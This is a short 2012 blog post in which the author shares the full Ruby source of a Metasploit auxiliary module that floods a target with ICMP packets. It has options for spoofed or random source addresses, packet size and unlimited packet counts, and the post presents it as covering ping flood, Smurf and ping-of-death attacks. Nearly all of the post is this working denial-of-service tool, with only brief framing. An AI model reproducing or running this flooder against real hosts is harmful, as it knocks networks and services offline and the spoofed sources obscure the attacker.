1/15/2012

Another simple Metasploit module: ICMP Flooder


Hi again!, I said I was going to develope VoIP related Metasploit modules but I was reading PacketFu documentation and I found that wrinting an ICMP flooder couldn´t be too complicated at this point. So I share this code too, I decided to include SHOST and SIZE options too trying to get a more flexible module able to make different flavors of this attack as Ping flood, Smurf or Ping of death. Next pictures show the module in  the same way of last post.

Code:

-------------------------------------------------------------------------
require 'msf/core'

class Metasploit3 < Msf::Auxiliary

include Msf::Auxiliary::Dos
include Msf::Exploit::Capture

def initialize
super(
'Name' => 'ICMP Flooder',
'Description' => 'A simple ICMP flooder',
'Author' => 'Jesus Perez',
'License'     => MSF_LICENSE,
'Version' => '$Revision: 0 $'
)

register_options(
[
OptAddress.new('SHOST', [false, 'The spoofable source address (else randomizes)']),
OptInt.new('NUM', [false, 'Number of ping packets to send (else unlimited)']),
OptInt.new('SIZE', [false, 'Size of ICMP packets to send (else 256 bytes)'])
], self.class)
deregister_options('FILTER','PCAPFILE','SNAPLEN')
end

def srchost
datastore['SHOST'] || [rand(0x100000000)].pack('N').unpack('C*').join('.')
end

def size
datastore['SIZE'].to_i.zero? ? 256 : datastore['SIZE'].to_i
end

def run
open_pcap

sent = 0
num = datastore['NUM']

print_status("ICMP flooding #{rhost}...")

p = PacketFu::ICMPPacket.new
p.icmp_type = 8
p.icmp_code = 0
p.ip_daddr = rhost

while (num <= 0) or (sent < num)
p.ip_saddr = srchost
p.payload = rand(36**size).to_s(36)
p.recalc
capture_sendto(p,rhost)
sent += 1
end

close_pcap
end
end

-------------------------------------------------------------------------


Figure: Usage information


Figure: Sniffed packets

Jesús Pérez